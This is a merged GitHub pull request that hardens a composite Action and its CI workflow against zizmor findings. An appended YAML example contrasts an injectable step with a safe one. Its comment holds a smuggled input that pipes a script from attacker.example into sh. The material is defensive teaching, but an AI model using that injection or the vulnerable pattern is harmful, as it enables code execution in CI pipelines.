Fix: Resolve zizmor security audit findings #164
Merged: ModeSevenIndustrialSolutions merged 1 commit into lfreleng-actions:main on Jun 19, 2026
Conversation
Copilot reviewed on behalf of ModeSevenIndustrialSolutions, June 18, 2026 15:03
Pull request overview
Hardens this repository’s composite GitHub Action and its CI workflow to address zizmor security audit findings, primarily by reducing expression/template injection risk in run: scripts and tightening checkout credential persistence.
Changes:
- Routes user-controlled `${{ inputs.* }}` expansions through step-level `env:` and uses quoted shell variables in `run:` steps.
- Adds targeted `zizmor: ignore[github-env]` annotations where `GITHUB_ENV` writes are intended and (per comments) validated.
- Updates pinned-action version comments and disables credential persistence for `actions/checkout` in the testing workflow.
Reviewed changes
Copilot reviewed 2 out of 2 changed files in this pull request and generated 9 comments.
| File | Description |
|---|---|
| action.yaml | Refactors input handling to reduce script-source interpolation risks; adds zizmor ignore annotations and updates pinned-action comments. |
| .github/workflows/testing.yaml | Hardens actions/checkout usage by setting persist-credentials: false and updates a pinned-action comment. |
Force-pushed 6369dbf to b8dce43
Copilot reviewed on behalf of ModeSevenIndustrialSolutions, June 19, 2026 03:40
Harden the composite action and testing workflow against
High-severity and Medium-severity zizmor findings:
- template-injection: route ${{ inputs.* }} and other expansions
through step-level env: blocks and reference them as quoted
shell variables, preventing expression injection into run:
scripts.
- ref-version-mismatch: correct stale version comments on pinned
actions (setup-uv -> v8.2.0, actions/cache -> v5.0.5) so they
match the commit the SHA actually points to.
- github-env: the values persisted to GITHUB_ENV are action-
internal and validated before being written (the action already
guards against env-file injection); they are env-by-nature and
carry scoped, justified ignores.
Also address review feedback:
- drop the redundant INPUTS_* env entries an autofix introduced
(including INPUTS_X, an undeclared input). The steps consume the
INPUT_* variables; the duplicate INPUTS_* names were unused and
confusing.
- reword the in-script justification comments to name the GitHub
Actions expression form (e.g. inputs.path_prefix) instead of
bash-style ${INPUTS_X} placeholders. The literal ${{ ... }}
token is deliberately avoided inside run: comments because the
runner would interpolate it -- the very vector being mitigated.
Confirmed clean with zizmor (0 High/Medium findings remaining).
Co-authored-by: Claude <claude@anthropic.com>
Signed-off-by: Matthew Watkins <mwatkins@linuxfoundation.org>
Force-pushed b8dce43 to 42518b2
Copilot reviewed on behalf of ModeSevenIndustrialSolutions, June 19, 2026 03:49
askb approved these changes on Jun 19, 2026
Merged 4129c28 into lfreleng-actions:main; 27 checks passed
Summary

Hardens the composite action and testing workflow against all High and Medium zizmor findings (19 High + 2 Medium before this change, 0 after).

Changes

- template-injection (High): In action.yaml and .github/workflows/testing.yaml, route ${{ inputs.* }} and other expansions through step-level env: blocks and reference them as quoted shell variables, preventing expression injection into run: scripts.
- ref-version-mismatch (2 Medium): Correct stale version comments on pinned actions so they match the commit the SHA actually points to (verified against GitHub):
  - astral-sh/setup-uv@fac544c… → # v8.2.0 (was # v7.2.0)
  - actions/cache@27d5ce7… → # v5.0.5 (was # v4.0.2)
- github-env (14 High): The values persisted to GITHUB_ENV are action-internal and are validated before being written — the action already guards against env-file injection (see the boolean / path / pytest_args / coverage validation steps). They are env-by-nature (consumed as environment variables by later steps), so each carries a scoped, inline-justified # zizmor: ignore[github-env].

Validation

- pre-commit (actionlint, yamllint, reuse, gitlint) passes.
- This branch was cut from the latest upstream/main.

Co-authored-by: Claude claude@anthropic.com
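The two hardening patterns the review and the PR description discuss, shown side by side as an added example. This is not code from the lfreleng-actions repository or from this PR: it is a hypothetical composite-action fragment. The input name `path_prefix` is taken from the commit message above; the step names, the allowlist regex, and the placement of the `zizmor: ignore` comment on the `run:` line are assumptions made for illustration, and the PR's own validation steps may differ.

```yaml
# Added example, not the repository's action.yaml: a composite action fragment
# showing the weak and hardened forms of the same step, plus a guarded
# GITHUB_ENV write. Only the input name path_prefix comes from the PR.
inputs:
  path_prefix:
    description: Directory the test command runs from (relative to the workspace)
    required: false
    default: "."

runs:
  using: composite
  steps:
    # WEAK (zizmor: template-injection). The runner substitutes the expression
    # into the script text before bash ever sees it, so a caller supplying
    #   path_prefix: '. ; curl https://attacker.example/x | sh'
    # gets that command run in the job's shell with the job's credentials.
    - name: Run tests (vulnerable form)
      shell: bash
      run: |
        cd ${{ inputs.path_prefix }}
        pytest

    # HARDENED. The expression expands only into an environment variable,
    # bash receives it as data, and the double quotes keep it a single word.
    - name: Run tests (hardened form)
      shell: bash
      env:
        INPUT_PATH_PREFIX: ${{ inputs.path_prefix }}
      run: |
        cd "$INPUT_PATH_PREFIX"
        pytest

    # GITHUB_ENV (zizmor: github-env). A value containing a newline would add
    # extra NAME=value lines to the env file (env-file injection), so validate
    # against a strict allowlist first. bash's =~ anchors to the whole string
    # and treats newline as an ordinary character, so multi-line values fail.
    # Leading '/' (absolute path) and leading '-' (option injection) also fail.
    # The ignore below is justified by that validation; placement on the run:
    # line is this example's choice.
    - name: Persist validated path prefix
      shell: bash
      env:
        INPUT_PATH_PREFIX: ${{ inputs.path_prefix }}
      run: |  # zizmor: ignore[github-env]
        if [[ ! "$INPUT_PATH_PREFIX" =~ ^[A-Za-z0-9.][A-Za-z0-9._/-]*$ ]] \
           || [[ "$INPUT_PATH_PREFIX" == *..* ]]; then
          echo "::error::path_prefix rejected: relative path of [A-Za-z0-9._/-] without '..' required"
          exit 1
        fi
        echo "PATH_PREFIX=$INPUT_PATH_PREFIX" >> "$GITHUB_ENV"
```

Two checks go with this. Running `zizmor action.yaml .github/workflows/testing.yaml` re-audits the files after the change; the first step above is reported as template-injection and the last is silenced only by the scoped ignore, so removing the validation while keeping the ignore would not be caught by the tool. For the ref-version-mismatch findings, `git ls-remote --tags https://github.com/astral-sh/setup-uv.git` lists each tag next to its commit; for an annotated tag the line ending in `^{}` is the peeled commit, and that SHA is the one a `uses:` pin and its `# vX.Y.Z` comment must agree on.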